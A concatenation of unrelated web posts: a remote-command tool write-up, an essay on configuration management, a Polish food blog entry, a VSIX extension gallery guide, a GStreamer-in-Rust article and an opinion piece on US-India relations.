  (-> (doto (Signature/getInstance (get algorithms keytype))
        (.initVerify (:public keypair))
        (.update (.getBytes str)))
      (.verify (-> signature Base64/decodeBase64))))

Redis support has several options, I used the jedis Java library which has support for everything we’re interested in.

Wrapping up

I have early - read: with lots of room for improvements, and a few corners cut - implementations of the protocol, both the agent and controller code in ruby, and the controller code in clojure, wrapped in my IRC bot in clojure, which might warrant another article.

The code can be found here: https://github.com/pyr/amiral (name alternatives welcome!)

If you just want to try out, you can fetch the amiral gem in ruby, and start an agent like so:

$ amiral.rb -k /path/to/privkey agent

You can then test querying the agent through a controller:

$ amiral.rb -k /path/to/privkey controller uptime
accepting acknowledgements for 2 seconds
got 1/1 positive acknowledgements
got 1/1 responses
phoenix.spootnik.org: 09:06:15 up 5 days, 10:48, 10 users,  load average: 0.08, 0.06, 0.05

If you’re feeling adventurous you can now start the clojure controller, it’s configuration is relatively straightforward, but a bit more involved since it’s part of an IRC + HTTP bot framework:

{:transports {amiral.transport.HTTPTransport {:port 8080}
              amiral.transport.irc/create    {:host "irc.freenode.net"
                                              :channel "#mychan"}}
 :executors {amiral.executor.fleet/create    {:keytype :dss
                                              :keypath "/path/to/key"}}}

In that config we defined two ways of listening for incoming controller requests: IRC and HTTP, and we added an “executor” i.e: a way of doing something.

You can now query your hosts through HTTP:

$ curl -XPOST -H 'Content-Type: application/json' -d '{"args":["uptime"]}' http://localhost:8080/amiral/fleet
{"count":1,
 "message":"phoenix.spootnik.org: 09:40:57 up 5 days, 11:23, 10 users,  load average: 0.15, 0.19, 0.16",
 "resps":[{"in_reply_to":"94ab9776-e201-463b-8f16-d33fbb75120f",
           "uuid":"23f508da-7c30-432b-b492-f9d77a809a2a",
           "status":"complete",
           "output":{"exit":0,
                     "time":"09:40:57",
                     "since":"5 days, 11:23",
                     "users":"10",
                     "averages":["0.15","0.19","0.16"],
                     "short":"09:40:57 up 5 days, 11:23, 10 users,  load average: 0.15, 0.19, 0.16"},
           "hostname":"phoenix.spootnik.org"}]}

Or on IRC:

09:42 < pyr> amiral: fleet uptime
09:42 < amiral> pyr: waiting 2 seconds for acks
09:43 < amiral> pyr: got 1/1 positive acknowledgement
09:43 < amiral> pyr: got 1 responses
09:43 < amiral> pyr: phoenix.spootnik.org: 09:42:57 up 5 days, 11:25, 10 users,  load average: 0.16, 0.20, 0.17

Next Steps

This was a fun experiment, but there are two outstanding problems which will need to be addressed quickly

  • Tests test tests. This was a PoC project to start with, I should have known better and wrote tests along the way.
  • The queue based reply handling makes controller logic complex, and timeout handling approximate, it should be switched to pub-sub
  • The signing should be done based on known hosts’ public keys instead of the shared key used now.
  • The agent should expose more common actions: service interaction, puppet runs, etc.

          The death of the configuration file   

Taking on a new platform design recently I thought it was interesting to see how things evolved in the past years and how we design and think about platform architecture.

So what do we do ?

As system developers, system administrators and system engineers, what do we do ?

  • We develop software
  • We design architectures
  • We configure systems

But it isn’t the purpose of our jobs, for most of us, our purpose is to generate business value. From a non technical perspective we generate business value by creating a system which renders one or many functions and provides insight into its operation.

And we do this by developing, logging, configuration and maintaining software across many machines.

When I started doing this - back when knowing how to write a sendmail configuration file could get you a paycheck - it all came down to setting up a few machines, a database server a web server a mail server, each logging locally and providing its own way of reporting metrics.

When designing custom software, you would provide reports over a local AF_UNIX socket, and configure your software by writing elegant parsers with yacc (or its GNU equivalent, bison).

When I joined the OpenBSD team, I did a lot of work on configuration files, ask any members of the team, the configuration files are a big concern, and careful attention is put into clean, human readable and writable syntax, additionally, all configuration files are expected to look and feel the same, for consistency.

It seems as though the current state of large applications now demands another way to interact with operating systems, and some tools are now leading the way.

So what has changed ?

While our mission is still the same from a non technical perspective, the technical landscape has evolved and went through several phases.

  1. The first era of repeatable architecture

    We first realized that as soon as several machines performed the same task the need for repeatable, coherent environments became essential. Typical environments used a combination of cfengine, NFS and mostly perl scripts to achieve these goals.

    Insight and reporting was then providing either by horrible proprietary kludges that I shall not name here, or emergent tools such as netsaint (now nagios), mrtg and the like.

  2. The XML mistake

    Around that time, we started hearing more and more about XML, then touted as the solution to almost every problem. The rationale was that XML was - somewhat - easy to parse, and would allow developers to develop configuration interfaces separately from the core functionality.

    While this was a noble goal, it was mostly a huge failure. Above all, it was a victory of developers over people using their software, since they didn’t bother writing syntax parsers and let users cope with the complicated syntax.

    Another example was the difference between Linux’s iptables and OpenBSD’s pf. While the former was supposed to be the backend for a firewall handling tool that never saw the light of day, the latter provided a clean syntax.

  3. Infrastructure as code

    Fast forward a couple of years, most users of cfengine were fed up with its limitations, architectures while following the same logic as before became bigger and bigger. The need for repeatable and sane environments was as important as it ever was.

    At that point of time, PXE installations were added to the mix of big infrastructures and many people started looking at puppet as a viable alternative to cfengine.

    puppet provided a cleaner environment, and allowed easier formalization of technology, platform and configuration. Philosophically though, puppet stays very close to cfengine by providing a way to configure large amounts of system through a central repository.

    At that point, large architectures also needed command and control interfaces. As noted before, most of these were implemented as perl or shell scripts in SSH loops.

    On the monitoring and graphing front, not much was happening, nagios and cacti were almost ubiquitous, while some tools such as ganglia and collectd were making a bit of progress.

Where are we now ?

At some point recently, our applications started doing more. While for a long time the canonical dynamic web application was a busy forum, more complex sites started appearing everywhere. We were not building and operating sites anymore but applications. And while with the help of haproxy, varnish and the likes, the frontend was mostly a settled affair, complex backends demanded more work.

At the same time the advent of social enabled applications demanded much more insight into the habits of users in applications and thorough analytics.

New tools emerged to help us along the way:

  • In memory key value caches such as memcached and redis
  • Fast elastic key value stores such as cassandra
  • Distributed computing frameworks such as hadoop
  • And of course on demand virtualized instances, aka: The Cloud
  1. Some daemons only provide small functionality

    The main difference in the new stack found in backend systems is that the software stacks that run are not useful on their own anymore.

    Software such as zookeeper, kafka, rabbitmq serve no other purpose that to provide supporting services in applications and their functionality are almost only available as libraries to be used in distributed application code.

  2. Infrastructure as code is not infrastructure in code !

    What we missed along the way it seems is that even though our applications now span multiple machines and daemons provide a subset of functionality, most tools still reason with the machine as the top level abstraction.

    puppet for instance is meant to configure nodes, not cluster and makes dependencies very hard to manage. A perfect example is the complications involved in setting up configurations dependent on other machines.

    Monitoring and graphing, except for ganglia has long suffered from the same problem.

The new tools we need

We need to kill local configurations, plain and simple. With a simple enough library to interact with distant nodes, starting and stopping service, configuration can happen in a single place and instead of relying on a repository based configuration manager, configuration should happen from inside applications and not be an external process.

If this happens in a library, command & control must also be added to the mix, with centralized and tagged logging, reporting and metrics.

This is going to take some time, because it is a huge shift in the way we write software and design applications. Today, configuration management is a very complex stack of workarounds for non standardized interactions with local package management, service control and software configuration.

Today dynamically configuring bind, haproxy and nginx, installing a package on a Debian or OpenBSD, restarting a service, all these very simple tasks which we automate and operate from a central repository force us to build complex abstractions. When using puppet, chef or pallet, we write complex templates because software was meant to be configured by humans.

The same goes for checking the output of running arbitrary scripts on machines.

  1. Where we’ll be tomorrow

    With the ease PaaS solutions bring to developers, and offers such as the ones from VMWare and open initiatives such as OpenStack, it seems as though virtualized environments will very soon be found everywhere, even in private companies which will deploy such environments on their own hardware.

    I would not bet on it happening but a terse input and output format for system tools and daemons would go a long way in ensuring easy and fast interaction with configuration management and command and control software.

    While it was a mistake to try to push XML as a terse format replacing configuration file to interact with single machines, a terse format is needed to interact with many machines providing the same service, or to run many tasks in parallel - even though, admittedly , tools such as capistrano or mcollective do a good job at running things and providing sensible output.

  2. The future is now !

    Some projects are leading the way in this new orientation, 2011 as I’ve seen it called will be the year of the time series boom. For package management and logging, Jordan Sissel released such great tools as logstash and fpm. For easy graphing and deployment etsy released great tools, amongst which statsd.

    As for bridging the gap between provisionning, configuration management, command and control and deploys I think two tools, both based on jclouds1 are going in the right direction:

    • Whirr2: Which let you start a cluster through code, providing

    recipes for standard deploys (zookeeper, hadoop)

    • pallet3: Which lets you describe your infrastructure as code and

    interact with it in your own code. pallet’s phase approach to cluster configuration provides a smooth dependency framework which allows easy description of dependencies between configuration across different clusters of machines.

  3. Who’s getting left out ?

    One area where things seem to move much slower is network device configuration, for people running open source based load-balancers and firewalls, things are looking a bit nicer, but the switch landscape is a mess. As tools mostly geared towards public cloud services will make their way in private corporate environments, hopefully they’ll also get some of the programmable


          Vivienne Westwood Womens Anglomania Apache Blouse - Bronze   
Vivienne Westwood Womens Anglomania Apache Blouse - Bronze

Vivienne Westwood Womens Anglomania Apache Blouse - Bronze


          Ulubieńcy maja 2017   

Maj dobiega końca, co mnie specjalnie nie cieszy, bo lubię ten miesiąc - za świeże warzywa, za wiosenny zapach w powietrzu i za majówkę. Może nie był on w tym roku zbyt ciepły, ale kilka letnich i słonecznych dni sprzyjało syntezie witaminy D. Wielu nowych produktów nie odkryłam (za to miałam wyjątkowo dużo przysmaków na granicy terminu ważności do wyjadania - dobrze, że zrobiłam przegląd zapasów ;)) i może czerwiec pod tym względem będzie ciekawszy. Poza niżej widocznymi produktami, do ulubieńców zdecydowanie mogę zaliczyć szczypiorek, pietruszkę, szparagi, botwinkę i młodą kapustę, a najlepsze jedzonko dopiero przed nami ;)


1. PULSIN RASPBERRY AND GOJI RAW CHOC BROWNIE

Batoniki kupiłam już jakiś czas temu w Rossmannie i dobrze, że wzięłam od razu kilka sztuk, bo bardzo mi smakowały, a teraz ich nie widuję. Odpowiadała mi zarówno zwarta, minimalnie proszkowa struktura zlepków, jak i smak - umiarkowanie słodki, lekko kakaowy, z wyraźnie wyczuwalnym dodatkiem suszonych malin. Do brownie, batonów raczej bym nie porównała, ale na to specjalnie nie liczyłam, patrząc na listę składników - daktyle, orzechy nerkowca, syrop i otręby z brązowego ryżu, surowe kakao, masło kakaowe, skoncentrowane soki owocowe (jabłkowy, winogronowy, gruszkowy), malina, goji, skrobia ryżowa, sól morska i ekstrakt z zielonej herbaty nie zapowiadają smaku ciasta. 50 gramowa sztuka dostarcza 208kcal. 

2. CUKIER KOKOSOWY (Zielony listek)

Cukier kokosowy to obecnie moja ulubiona substancja słodząca, dodająca smaku wielu daniom, a ten powyższy także mnie nie zawiódł. Cechował się lekko karmelkowym smakiem (jego słodkość bym oceniła jako nieznacznie niższą od zwykłego cukru) oraz przyjaznym zapachem. Plusem cukru tej firmy jest także to, że zapakowano go w dwie osobne torebeczki, przez co dłużej zachowuje świeżość. Używam go najczęściej do kakao, kawy i jaglanek, a trochę zabieram ze sobą w małym słoiczku do pracy na wypadek, gdybym musiała coś posłodzić :)

3. MIGDAŁY EKOLOGICZNE

Przez cały maj migdały, wraz z innymi orzechami, stanowiły częsty dodatek do moich śniadań. Te widoczne powyżej cechowały się naturalnym i świeżym smakiem oraz cudownym aromatem, który jeszcze bardziej dawał o sobie znać pod wpływem wizyty w piekarniku ;) Kupuję je w Tesco i polecam, tak jak inne orzechy i suszone owoce tej firmy.

4. EKOLOGICZNE KAKAO ODTŁUSZCZONE

Zazwyczaj używam kakao surowego, ale tym razem kupiłam takie odtłuszczone, z myślą o wyrobach pieczonych i to sprawdziło się znakomicie. Proszek jest aromatyczny, ma bardzo bogaty smak i dość ciemny kolor. 

5. BANANY W SUROWEJ CZEKOLADZIE (Cocoa)

Dawno nie jadłam już bananów tej firmy, ale kończący się termin ważności mnie do tego skłonił. Te, które miałam ostatnim razem, były chyba w nieco większych kawałkach, ale pod względem smaku nie mogę im nic zarzucić. Łączyły w sobie aromat słodkich suszonych bananów o żujnej konsystencji, z niesamowitym smakiem surowej czekolady - naprawdę cudowna kombinacja. W składzie znajdziemy czekoladę złożoną z ziarna kakaowca, cukru palmowego i masła kakaowego oraz suszone banany, a wszystko to z upraw ekologicznych. W 100g przysmaku mieści się 438kcal. 

6. WODA KOKOSOWA (Vera Farm)

O tej wodzie kokosowej chyba już kiedyś w ulubieńcach wspominałam, ale w maju sporo jej wypiłam, czemu sprzyjały podróże i promocja w Rossmannie :D Uwielbiam tę wodę za jej pyszny kokosowy, orzeźwiający smak (wg mnie smakuje jak ta pita prosto z młodego kokosu), naturalny skład i bogactwo elektrolitów - świetnie nawadnia po wysiłku fizycznym. 

7. WEGAŃSKIE KRÓWKI TOFFI

Nie będę się teraz o tych krówkach rozpisywać, bo w środę na blogu pojawi się recenzja, ale na miejsce w notce z ulubieńcami miesiąca zasługują ;)

8. ŚNIADANIA

Na śniadania standardowo najczęściej jadłam owsianki - gotowane oraz pieczone, a także placki, a w niedzielę kanapki. Gotowane zagęszczałam zazwyczaj budyniem waniliowym, a do pieczonych przeważnie dokładałam rabarbar, komponujący się pysznie np. ze słodkim bananem (w ogóle w maju zjadłam dużo bananów - bardzo lubię te ekologiczne z Lidla) - przepis na taką owsiankę znajdziecie tutaj

9. OBIADY

Na obiad z kolei najczęściej jadłam mieszanki warzywno - kaszowo - strączkowe, zupy (zwłaszcza botwinkową z mleczkiem kokosowym), a raz robiłam kotlety buraczano jaglane. W moich daniach nie brakowało szparagów, szczypiorku, mrożonej fasolki czy brokułów, a także ekologicznej cukinii z Lidla - jest przepyszna :)


A moje dania na wynos najczęściej wyglądały tak, jak zestaw widoczny powyżej - składały się z komosy ryżowej (lub niepalonej kaszy gryczanej) ugotowanej z czarną fasolą z dodatkiem oliwek oraz warzyw, hummusu i koncentratu pomidorowego. 

10. RECENZOWANE PRZYSMAKI
Chyba wszystkie produkty recenzowane w maju zaliczyć mogę do ulubieńców miesiąca. Chałwy, jakie otrzymałam w ramach współpracy od firmy Gacjana (a zwłaszcza orzechowa) były przepyszne, podobnie jak czekolady hiszpańskiej firmy Sole oraz masło orzechowe firmy Horizon - chyba najlepsze fistaszkowe, jakie do tej pory jadłam :)


Masło z orzechów ziemnych Horizon
Organiczna czekolada z pomarańczą Sole
Chałwy lniane Gacjana - żurawinowa i orzechowa
Organiczna czekolada z cynamonem Sole

A czy Wam udało się odkryć w maju coś dobrego?

          VSIX Extension Gallery for Visual Studio   
In a [previous article](/2017/05/vs-itemtemplates-wizards-and-vsix.html) I discussed how to create Item and Project templates and bundle them into their own VSIX installers. However, now that you have your VSIX installer the question becomes how do you distribute it to all your coworkers? It would be great if they could use the _Extensions and Updates_ manager that is already built into Visual Studio. That handles installing, uninstalling, searching and auto-updating extensions. Pretty neat! However the project you have is not suitable to have in a public VSIX repository like the [Visual Studio Marketplace](https://marketplace.visualstudio.com/vs).
The public marketplace is no place for internal company extensions unfortunately.

The public marketplace is no place for internal company extensions unfortunately.

You need to host your own private marketplace. **But how?** TL;DR; I built one # Private Extension Galleries Microsoft has [addressed this issue](https://blogs.msdn.microsoft.com/visualstudio/2011/10/03/private-extension-galleries-for-the-enterprise/) but only through documentaton. There are no concrete implementations available from Microsoft nor any others on how to host and serve these files. Neither is there a simple way to leverage the advanced features the Extension Manager provides (such as search, ratings and download counts). ## So what is available? Unfortunately the commercial offerings are incredibly limited. The main one [myget.org](https://www.myget.org) is purely online and regretfully not free. The popular [Nexus Repository](https://www.sonatype.com/nexus-repository-oss) by Sonatype dropped support for VSIX files in their latest version (v3). There are some [half-automated](https://github.com/garrettpauls/VSGallery.AtomGenerator) solutions out there, others [very manual](https://www.codeproject.com/Articles/881890/Your-Private-Extension-Gallery). The worst thing about most of the automatic offerings is that they require being run on an [existing webserver](http://blog.ehn.nu/2012/11/using-private-extension-galleries-in-visual-studio-2012/) (IIS, Apache, Ngix, etc) and require a relational database system to store data. So there really is no freely available out-of-the-box solution available. **Until now...** # Introducing vsgallery
The VS-Gallery running inside of Visual Studio's Extension Manager

The VS-Gallery running inside of Visual Studio's Extension Manager

With the current rise in popularity of [_the Microservice_](https://en.wikipedia.org/wiki/Microservices) I found it really disappointing that a simple click-to-run solution wasn't available to run a private Visual Studio Marketplace. I wanted something simple and self-contained that could be run without installing and configuring multiple other systems (such as a webserver and a database system). ## The VS Gallery solution Before I bore you with more text, go ahead and test [_vsgallery_](https://github.com/sverrirs/vsgallery) out. Just download the latest release and run the executable file. It is really that super simple. I promise! Download vsgallery **vsgallery** is a single executable file which acts as a complete self hosted extension gallery for Visual Studio 2010 and newer. It really is ultra simple to configure and run. You are up and running in a few seconds. All for the low low price of **FREE**! The whole system runs as a single self-contained executable and uses no database. All files and data are stored on the local file system which makes maintenance and backup super simple.
## Features * Fully featured Extension Gallery ready to use in Microsoft Visual Studio. * Counts downloads of extensions * Displays star ratings, release notes and links to project home pages * Offers a simple to use REST API to submit ratings and upload new VSIX packages * Atom and JSON feeds for available packages * It's FREE! # How to install into Visual Studio In Visual Studio ``` Tools > Options > Environment > Extensions and Updates ``` Add a new entry and copy in the URL of the main Microservice Atom Feed. > By default the URL is `http://YOUR_SERVER:5100/feeds/atom.xml`
Please consult [this MSDN document](https://msdn.microsoft.com/en-us/library/hh266746.aspx) for any further details and alternative options on how to install a Private Extension Gallery in Visual Studio. # How it works The microservice is configured via the `config.ini` file that sits in the same folder as the main executable. The `.vsix` files, along with their download counts and ratings data are stored in a subfolder of the main service executable `VsixStorage/` (this subfolder is configurable). This makes taking backups and moving the service between machines super easy as the root folder contains the entire Microservice state and data. ``` root-folder |--vsgallery.exe |--config.ini |--VsixStorage |--atom.xml |--First.vsix |--Second.vsix |--AndSoForth.vsix ``` Latest release # The vsgallery API The Microservice comes with a rich HTTP based API. You can plug the data and its functionality directly into your development portal or company intranet with minimal web programming. Even direct integration into your continuous integration platforms and communication pipelines such as #slack are possible. > The `vsix_id` required by many of the endpoints can be obtained by reading the `id` field in the feed endpoints. ### [GET] /feeds/atom.xml This is the main entry point for the VSIX feed and serves up the Syndicate-Feed compatible Atom file containing all available extensions on the server. **This is the URL endpoint that should be used in Visual Studio.** See [How to install into Visual Studio](#how-to-install) for more information. ### [GET] /api/ratings/{vsix_id} Retrieves the rating value and vote count for a particular VSIX package by its ID. ``` curl -X GET http://VSGALLERY_SERVER:5100/api/ratings/VSIX_ID ``` The return type is the following JSON ``` { "rating": 4.3, "count": 19 } ``` ### [POST/PUT] /api/ratings/{vsix_id} Submitting rating values for a particular VSIX package by its ID. The post payload should be just raw string and contain a single floating point value in the range between [0.0, 5.0]. The example below will post a rating of `3.5` stars to VSIX package with the id `VSIX_ID` ``` curl -X POST -H "Content-Type: text/plain" --data "3.5" http://VSGALLERY_SERVER:5100/api/ratings/VSIX_ID ``` ### [GET] /api/json JSON feed for the entire package catalog. Same data that is being fed through the atom feed but just in a handier JSON format. ### [POST/PUT] /api/upload This endpoint accepts form-data uploads of one or more .vsix files to the hosting service. The example below will upload the file `my.vsix` to the gallery server and propose a new name for it `renamed.vsix` (you can omit the filename param to use the original name) ``` curl -X POST --form "file=@my.vsix;filename=renamed.vsix" http://VSGALLERY_SERVER:5100/api/upload ``` To upload multiple files simply add more form elements. The example below uploads two VSIX files at the same time. ``` curl -X POST --form "file1=@my.vsix" --form "file1=@your.vsix" http://VSGALLERY_SERVER:5100/api/upload ``` # Closing So if you're searching for a simple solution for your internal, low traffic, extension gallery then please consider **vsgallery**. If you do try it out, please leave me feedback in the comments below. Peace! vsgallery
          New Job   

I mentioned in my last post that I was learning Perl in the hopes of landing a job. Well, that has now paid off as I will be starting at Summersault next week. I’m pretty excited to get out of working with Microsoft tools. I was worried about getting pigeonholed into that if I took another job with it. While C# is a great language, my moral objections to Microsoft’s business practices far outweigh my love of C#. Now I get to work with a variation of the LAMP stack (FreeBSD, Apache, PostgreSQL, and Perl) as part of a small team. And other people can actually see my work this time. That was sometimes frustrating when writing internal web apps.

This change may effect my open source work with Trac. Summersault does not use it internally (RT seems to be the standard with Perl). Up until now LSR’s use of it was a major motivator for me to get involved. We will see if I am able to sustain interest when I am not using it on a daily basis. If not, I will put out a call for someone to adopt the batch modify plugin. The whiteboard plugin will probably just die. I can’t see anybody else wanting to put the necessary work into it.


          12265 Senior Programmer Analyst - CANADIAN NUCLEAR LABORATORIES (CNL) - Chalk River, ON   
Understanding of server technologies (Internet Information Server, Apache, WebLogic), operating systems (Windows 2008R2/2012, HP-UX, Linux) and server security....
From Indeed - Wed, 07 Jun 2017 17:50:30 GMT - View all Chalk River, ON jobs
          Application Development Team - (Holyoke)   
Application Development TeamGRT Corporation is looking for three Java/Oracle specialists to deliver web based application for its client located in Holyoke, MA.Highly experienced Software Developer and Architect - to assist in the design of a next generation web application offering.Two Web Application Developers - to develop and support of all external/internal web related software and applicationsW2 tax term is required for all positions ResponsibilitiesArchitect - architect, design, and code using Spring and other open source technologies while investigate existing and new technologies to build new features and integration pointsDevelopers - code and support external/internal web related software and applications while assisting with the development of test conditions and scenarios. Collaborate with other team members to implement application features, including user interface & business functionalityQualificationsB.S. degree in Computer Science, or equivalent Minimum of 5+ years software development experienceExperience with UNIX operating system, services, and commandsExperience with J2EE, Hibernate, Spring and StrutsExperience with modern front-end Javascript libraries (jQuery)Experience with REST/JSON APIsExperience on application servers such as Apache Tomcat, JBOSS EAP 6.xHands on experience with JAX RS, JAXB, JMS, Spring 4Strong experience in Junit, Mockito, Spring-Test and automated testing in general is MUSTExperience creating/consuming Web servicesExperience with Testing frameworksStrong Experience working with databases -PL/SQLDemonstrates integrity and authenticity Additional QualificationsArchitectExperience in agile methodology5-10+ years' experience writing robust web applications with Spring Framework (Spring Boot, Spring security, Spring MVC, etc.) using JavaFamiliarity with GIT, CVS source code management toolDeveloper 1Java frameworks especially micro service architectureJava framework and messaging architectureDeveloper 2Experience with SalesForce APIStrong experience in Enterprise Application Integration patterns (EAI)If you are interested, please apply to the positions providing the following:Indicate position you applyYour current/desired compensationDay time phone number Authorization statusthomas.simpson@grtcorp.comRegards,Thomas SimpsonHR SpecialistGRT CorporationStamford, CT 06901Web: , J2EE, JSON, Spring 4, Hibernate, Struts, Jaxb, Jaxr, PL/SQL Source: http://www.juju.com/jad/000000009qi9id?partnerid=af0e5911314cbc501beebaca7889739d&exported=True&hosted_timestamp=0042a345f27ac5dc0413802e189be385daf54a16310431f6ff8f92f7af39df48
          Sebastian Dröge: Writing GStreamer Elements in Rust (Part 4): Logging, COWs and Plugins   

This is part 4, the older parts can be found here: part 1, part 2 and part 3

It’s been quite a while since the last update again, so I thought I should write about the biggest changes since last time again even if they’re mostly refactoring. They nonetheless show how Rust is a good match for writing GStreamer plugins.

Apart from actual code changes, also the code was relicensed from the LGPL-2 to a dual MIT-X11/Apache2 license to make everybody’s life a bit easier with regard to static linking and building new GStreamer plugins on top of this.

I’ll also speak about all this and more at RustFest.EU 2017 in Kiev on the 30th of April, together with Luis.

The next steps after all this will be to finally make the FLV demuxer feature-complete, for which all the base-work is already done now.

Logging

One thing that was missing so far and made debugging problems always a bit annoying was the missing integration with the GStreamer logging infrastructure. Adding println!() everywhere just to remove them again later gets boring after a while.

The GStreamer logging infrastructure is based, like many other solutions, on categories in which you log your messages and levels that describe the importance of the message (error, warning, info, …). Logging can be disabled at compile time, up to a specific level, and can also be enabled/disabled at runtime for each category to a specific level, and performance impact for disabled logging should be close to zero. This now has to be mapped somehow to Rust.

During last year’s “24 days of Rust” in December, slog was introduced (see this also for some overview how slog is used). And it seems like the perfect match here due to being able to implement new “output backends”, called a Drain in slog and very low performance impact. So how logging works now is that you create a Drain per GStreamer debug category (which will then create the category if needed), and all logging to that Drain goes directly to GStreamer:

// The None parameter is a GStreamer Element, which allows the logging system to
// print the element name and other things on the GStreamer side
// The 0 is for defining a color for the logging in that category
let logger = Logger::root(GstDebugDrain::new(None,
                                             "mycategory",
                                             0,
                                             "Some description"),
                                             None);
debug!(logger, "Some output with a number {}", 1);

With lazy_static we can then make sure that the Drain is only created once and can be used from multiple places.

All the implementation for the Drain can be found here, and it’s all rather straightforward plumbing. The interesting part here however is that slog makes sure that the message string and all its formatting arguments (the integer in the above example) are passed down to the Drain without doing any formatting. As such we can skip the whole formatting step if the category is not enabled or its level is too low, which gives us almost zero-cost logging for the cases when it is disabled. And of course slog also allows disabling logging up to a specific level at compile time via cargo’s features feature, making it really zero-cost if disabled at compile time.

Safe & simple Copy-On-Write

In GStreamer, buffers and similar objects are inheriting from a base class called GstMiniObject. This base class provides infrastructure for reference counting, copying (cloning) of the objects and a dynamic (at runtime, not to be confused with Rust’s COW type) Copy-On-Write mechanism (writable access requires a reference count of 1, or a copy has to be made). This is very similar to Rust’s Arc, which for a contained type that implements Clone provides the make_mut() and get_mut() functions that work the same way.

Now we can’t unfortunately use Arc directly here for wrapping the GStreamer types, as the reference counting is already done inside GStreamer and adding a second layer of reference counting on top is not going to make things work better. So there’s now a GstRc, which provides more or less the same API as Arc and wraps structs that implement the GstMiniObject trait. The latter provides GstRc functions for getting the raw pointer, swap the raw pointer and create new instances from a raw pointer. The actual structs for buffers and other types don’t do any reference counting or otherwise instance handling, and only have unsafe constructors. The general idea here is that they will never exist outside a GstRc, which will then can provide you with (mutable or not) references to them.

With all this we now have a way to let Rust do the reference counting for us and enforce the writability rules of the GStreamer API automatically without leaving any chance of doing things wrong. Compared to C where you have to do the reference counting yourself and could accidentally try to modify a non-writable (reference count > 1) object (which would give an assertion), this is a big improvement.

And as a bonus this is all completely without overhead: all that is passed around in the Rust code is (once compiled) the raw C pointer of the objects, and the functions calls directly map to the C functions too. Let’s take an example:

// This gives a GstRc
let mut buffer = Buffer::new_from_vec(vec![1, 2, 3, 4]).unwrap();

{ // A new block to keep the &mut Buffer scope (and mut borrow) small
  // This would fail (return None) if the buffer was not writable
  let buffer_ref = buffer.get_mut().unwrap();
  buffer_ref.set_pts(Some(1));
}

// After this the reference count will be 2
let mut buffer_copy = buffer.clone();

{
  // buffer.get_mut() would return None, the below creates a copy
  // of the buffer instead, which makes it writable again
  let buffer_copy_ref = buffer.make_mut().unwrap();
  buffer_copy_ref.set_pts(Some(2));
}

// Access to Buffer functions that only require a &mut Buffer can
// be done directly thanks to the Deref trait
assert_ne!(buffer.get_pts(), buffer_copy.get_pts());

After reading this code you might ask why DerefMut is not implemented in addition, which would then do make_mut() internally if needed and would allow getting around the extra method call. The reason for this is that make_mut() might do a (expensive!) copy, and as such DerefMut could do a copy implicitly without the code having any explicit indication that a copy might happen here. I would be worried that it could cause non-obvious performance problems.

The last change I’m going to write about today is that the repository was completely re-organized. There is now a base crate and separate plugin crates (e.g. gst-plugin-file). The former is a normal library crate and contains some C code and all the glue between GStreamer and Rust, the latter don’t contain a single line of C code (and no unsafe code either at this point) and compile to a standalone GStreamer plugin.

The only tricky bit here was generating the plugin entry point from pure Rust code. GStreamer requires a plugin to export a symbol with a specific name, which provides access to a description struct. As the struct also contains strings, and generating const static strings with ‘\0’ terminator is not too easy, this is still a bit ugly currently. With the upcoming changes in GStreamer 1.14 this will become better, as we can then just export a function that can dynamically allocate the strings and return the struct from there.

All the boilerplate for creating the plugin entry point is hidden by the plugin_define!() macro, which can then be used as follows (and you’ll understand what I mean with ugly ‘\0’ terminated strings then):

plugin_define!(b"rsfile\0",
               b"Rust File Plugin\0",
               plugin_init,
               b"1.0\0",
               b"MIT/X11\0",
               b"rsfile\0",
               b"rsfile\0",
               b"https://github.com/sdroege/rsplugin\0",
               b"2016-12-08\0");

As a side-note, handling multiple crates next to each other is very convenient with the workspace feature of cargo and the “build –all”, “doc –all” and “test –all” commands since 1.16.


          Turning the U.S.-India Alignment into an Alliance   

"Our robust strategic partnership is such that it touches upon almost all areas of human endeavor....We consider the USA as our primary partner for India's social and economic transformation in all our flagship programs and schemes," proclaimed Indian Prime Minister Narendra Modi on June 26. The venue was the joint press conference with President Donald Trump following their lengthy meeting at the White House. This is a sentiment that America must strengthen and build upon to contain the expanding ambitions of China.

Of course, diplomatic niceties prevented any actual public mention of the Communist regime as a common threat to the world's two largest democracies. Nor was China's ally Pakistan mentioned, even as the two leaders talked about defeating terrorism in the region. President Trump noted "Both our nations have been struck by the evils of terrorism, and we are both determined to destroy terrorist organizations and the radical ideology that drives them. We will destroy radical Islamic terrorism." In the case of India, terrorism has been linked directly to Pakistan which has been supporting an insurgency in Kashmir ever since that Muslim province was incorporated into India when the British Raj was partitioned in 1947.

Pakistan was founded as an Islamic state with the mission to unite all Muslims in the region. India was founded on a more tolerant, multicultural democratic standard and counts 175 million Muslims among its 1.3 billion citizens. In must be remembered that it was Pakistan that blocked a UN plebiscite on Kashmir's fate because it feared too many Muslims would vote to live in the more attractive society of India than in a militant regime. Pakistan failed in its bid to seize control of Kashmir but has continued to stir up jihadist movements in the province. Vice President Mike Pence, speaking to the U.S.-India Business Council on June 27, mentioned how "barbarians have struck on Indian soil too many times over the decades, including the horrific attacks in Mumbai nearly a decade ago, claiming the lives of more than 160 innocents, including six Americans." That attack was traced to Pakistan. Hours before Modi's arrival, the State Department imposed sanctions on Syed Salahuddin, the Pakistan-based leader of Hizbul Mujahideen, the main Kashmir terrorist group.

PM Modi stated, "Fighting terrorism and doing away with the safe shelters, sanctuaries, and safe havens will be an important part of our cooperation," clearly with Pakistan in mind; not only regarding Kashmir, but also Afghanistan. The U.S. and its coalition (which includes India, for whose contributions President Trump thanked Modi) cannot end the war in Afghanistan as long as the Taliban (and now ISIS) can lick their wounds and rebuild their forces in Pakistan; free to cross the border at times of their own choosing. 

The threat from China was alluded to when President Trump mentioned how Indian forces "will join together with the Japanese navy to take part in the largest maritime exercise ever conducted in the vast Indian Ocean." What links Japan and India is concern over Beijing's expansion across the Pacific Rim and into the Indian Ocean. Beijing's ambitious "Belt and Road" development initiative which is designed to impose a "common destiny" on Eurasia is opposed by both India and Japan. The Chinese plan will build on programs hat have already been underway in Pakistan and Sri Lanka, posing direct threats to Indian security.

The U.S. and Japan can and must counter the Chinese initiative by increasing their role in developing the Indian economy, which can truly be a "win-win" relationship. China's rise has been fueled by short-sighted American business firms willfully ignorant of the true nature of the Beijing regime. They have transferred technology and production capacity to a strategic rival of their home country. The pursuit of private profit without adequate supervision by a Washington establishment blinded by naive liberal hopes and corrupted by corporate cash has helped to create a threat Americans will have to face for decades to come. It would be a much better world if all the Western capital sent to China had gone to India instead. Trade is properly conducted among friends, not adversaries where the "gains from trade" are used to create menacing capabilities.

